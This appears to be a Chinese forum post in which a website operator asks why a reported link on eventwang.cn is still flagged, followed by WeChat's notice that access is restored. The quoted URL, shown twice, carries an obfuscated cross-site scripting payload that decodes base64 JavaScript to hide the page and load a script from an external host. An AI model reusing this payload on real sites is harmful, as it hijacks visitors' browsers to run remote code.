https://www.eventwang.cn/Wap/DesignResource/index/vyjbciwk/b57qpa?7wo5qs1=3l8z8g8ifk&option='-Function(\u0061\u0074\u006f\u0062('ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQoZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0JykpLnNyYz0nLy9mbHl0by5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tL3gnO3Rocm93IDA='))()-'&FYrfPpO=BDNrEmEEOzwKCm0VBDgqUC4OpPfrYFAANTWAAfAkQBDB9HHg4RHUVIDg_r8-a28_S0ofz9t-eq5eH85Kz35fH74uD59_21__M#1610258051764
上面链接被举报,我们已经排查了漏洞,做了参数过滤与安全跳转,申请反馈还是说存在,就不知道哪里存在了
猜测攻击方法是浏览器漏洞,不是我们能控制的
你好,经核实域名eventwang.cn下的链接【https://www.eventwang.cn/Wap/DesignResource/index/vyjbciwk/b57qpa?7wo5qs1=3l8z8g8ifk&option=%27-Function%28%5Cu0061%5Cu0074%5Cu006f%5Cu0062%28%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQoZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0JykpLnNyYz0nLy9mbHl0by5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tL3gnO3Rocm93IDA%3D%27%29%29%28%29-%27&FYrfPpO=BDNrEmEEOzwKCm0VBDgqUC4OpPfrYFAANTWAAfAkQBDB9HHg4RHUVIDg_r8-a28_S0ofz9t-eq5eH85Kz35fH74uD59_21__M#1610258051764】违规内容已经修改,现已恢复微信内直接访问的服务,请知悉。
详细规则请参考《微信外部链接内容管理规范》http://weixin.qq.com/cgi-bin/readtemplate?t=weixin_external_links_content_management_specification